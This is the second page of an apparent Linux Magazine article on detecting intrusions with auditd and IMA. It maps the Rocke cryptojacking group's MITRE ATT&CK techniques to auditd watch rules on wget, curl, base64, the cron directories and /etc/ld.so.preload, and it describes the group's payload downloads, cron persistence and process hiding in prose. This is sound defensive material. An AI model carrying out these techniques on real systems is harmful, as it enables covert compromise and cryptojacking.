Better security auditing with Auditd and the Integrity Measurement Architecture
Visibility Logs
If IMA and auditd are configured correctly, events from the log can be sent to the SIEM or log management system. A full-featured log management system will make it easier to search and correlate information. It will certainly be a good way to react faster to suspicious events or attacks. Values for the file hash, path, UID, or GID can help to detect possible security issues related to the event.
Graylog is a centralized logging solution that allows the user to aggregate and search through logs. Graylog provides a means for storing logs at a centralized location. (Keeping all the logs in one place helps you identify the issues easily.) You can use Graylog to collect and analyze logs from various sources: operating systems, application servers, hardware, and software firewalls. Graylog also helps you monitor websites, web applications, and other areas of IT infrastructure.
Figure 1 shows an example of the same event that was generated when I launched the script script.sh
.
Once everything is configured, you can monitor your system and also hunt for threats. It is worth configuring your rules in such a way that they detect the events that are most important. If you aren't sure which rules are the most useful in detecting threats, it could be worth reaching for the MITER ATT&CK Framework.
Uncovering an Attack
The MITRE ATT&CK framework [3] is a knowledge base and model for documenting the life cycle and behavior of cyber attacks. The framework documents attacker tactics and techniques based on real-world observations. MITRE also helps to categorize adversary action and recommends specific ways of defending against an attack. The reports can vary in depth and insight – unfortunately, not all techniques are easily mapped.
If you know the details of how an attacker operates, it is much easier to search the audit log for evidence of an attack. MITRE is a good source for that preliminary attack information.
As an example, suppose you were checking to see if the Rocke group had infiltrated your system? According to the MITRE website [4]:
Rocke is an alleged Chinese-speaking adversary whose primary objective appears to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency.
The group specializes in attacks on Linux systems.
MITRE ATT&CK gives each technique its own number. The number is used to map the technique to auditd, which makes it possible to distinguish which technique the alert concerns, as follows:
- T1140 Deobfuscate/Decode Files or Information
According to this alert, which appears in the -k
(keyname) field of the auditd log entry, Rocke group has extracted tar.gz
files after downloading them from a command and control server. A report at MITRE ATT&CK says that Rocke group downloads payloads hosted on a legitimate website (Pastebin.com). The group uses the curl
or wget
utilities to download payloads to execute with a bash shell.
-w /usr/bin/wget -p x -k T1140-Deobfuscate-Decode-Files-or-Information -w /usr/bin/curl -p x -k T1140-Deobfuscate-Decode-Files-or-Information
In the same step, the group decodes commands from binary into ASCII format using Base64:
-w /usr/bin/base64 -p x -k T1140-Deobfuscate-Decode-Files-or-Information
The Bitcoin miner itself is downloaded using shell scripts, curl, or wget from another location other than Pastebin. First, a config.json
file containing the miner configuration data is downloaded, and then the rest of the miner. Next the group downloads mining executables from its own Git repositories and saves them under the filename java
or kworkerds
in the /tmpv
, /var/tmp
, or /dev/shm
directory. Understanding this kind of behavior lets you make rules to detect it.
- T1053.003 Scheduled Task/Job: Cron
Rocke has installed a cron job that downloads and executes files from the command and control center.
Rocke creates cron jobs that persist on the victim's systems, which lets the attacker execute commands on a schedule without the need to be logged in. Rocke manipulates cron jobs, replacing the cron schedule and placing a malicious script in a folder that will execute hourly, daily, or weekly as part of existing cron jobs (Listing 3).
Listing 3
Tricks with Cron
-w /etc/cron.daily/ -p wa -k T1053.003-Scheduled Task-Job-Cron -w /etc/cron.hourly/ -p wa -k T1053.003-Scheduled Task-Job-Cron -w /etc/cron.monthly/ -p wa -k T1053.003-Scheduled Task-Job-Cron -w /etc/cron.weekly/ -p wa -k T1053.003-Scheduled Task-Job-Cron -w /var/spool/cron/crontabs/ -p wa -k T1053.003-Scheduled Task-Job-Cron
- T1574.006 Hijack Execution Flow: Dynamic Linker Hijacking
This alert shows that Rocke has modified /etc/ld.so.preload
to hook libc
functions in order to hide the installed dropper and mining software in process lists. The group uses the open source tool libprocesshider
to hide the process, before executing a file that modifies /etc/ld.so.preload
.
-w /etc/ld.so.preload -p wa -k T1574.006-Hijack-Execution-Flow-Dynamic-Linker-Hijacking
This information on the Rocke group makes it easy to search the audit log for a Rocke attack (refer to Listing 1). You can use the log to uncover:
- The path of the file that was executed and the path of its parent
- The PID and parent PID (PPID) of the executable
- The hash value of the file
- The UID, GID, and EUID of the process owner
You can then check whether an earlier version of the hash is already in a database, and if so, comparing the versions could indicate whether file has been altered.
Conclusion
IMA, together with auditd, can certainly help you protect your systems. Of course, this setup won't cover all security surfaces, but being able to recognize hashes and expose attack techniques can help you detect threats faster. In addition to supporting faster threat recognition, IMA also lets you customize your rules. As you can see from the Rocke group example, you can use the Linux auditing system to discover techniques and tools that might indicate an attack.
« Previous 1 2
Buy this article as PDF
(incl. VAT)
Buy Linux Magazine
Subscribe to our Linux Newsletters
Find Linux and Open Source Jobs
Subscribe to our ADMIN Newsletters
Support Our Work
Linux Magazine content is made possible with support from readers like you. Please consider contributing when you’ve found an article to be beneficial.
News
-
So Long Neofetch and Thanks for the Info
Today is a day that every Linux user who enjoys bragging about their system(s) will mourn, as Neofetch has come to an end.
-
Ubuntu 24.04 Comes with a “Flaw"
If you're thinking you might want to upgrade from your current Ubuntu release to the latest, there's something you might want to consider before doing so.
-
Canonical Releases Ubuntu 24.04
After a brief pause because of the XZ vulnerability, Ubuntu 24.04 is now available for install.
-
Linux Servers Targeted by Akira Ransomware
A group of bad actors who have already extorted $42 million have their sights set on the Linux platform.
-
TUXEDO Computers Unveils Linux Laptop Featuring AMD Ryzen CPU
This latest release is the first laptop to include the new CPU from Ryzen and Linux preinstalled.
-
XZ Gets the All-Clear
The back door xz vulnerability has been officially reverted for Fedora 40 and versions 38 and 39 were never affected.
-
Canonical Collaborates with Qualcomm on New Venture
This new joint effort is geared toward bringing Ubuntu and Ubuntu Core to Qualcomm-powered devices.
-
Kodi 21.0 Open-Source Entertainment Hub Released
After a year of development, the award-winning Kodi cross-platform, media center software is now available with many new additions and improvements.
-
Linux Usage Increases in Two Key Areas
If market share is your thing, you'll be happy to know that Linux is on the rise in two areas that, if they keep climbing, could have serious meaning for Linux's future.
-
Vulnerability Discovered in xz Libraries
An urgent alert for Fedora 40 has been posted and users should pay attention.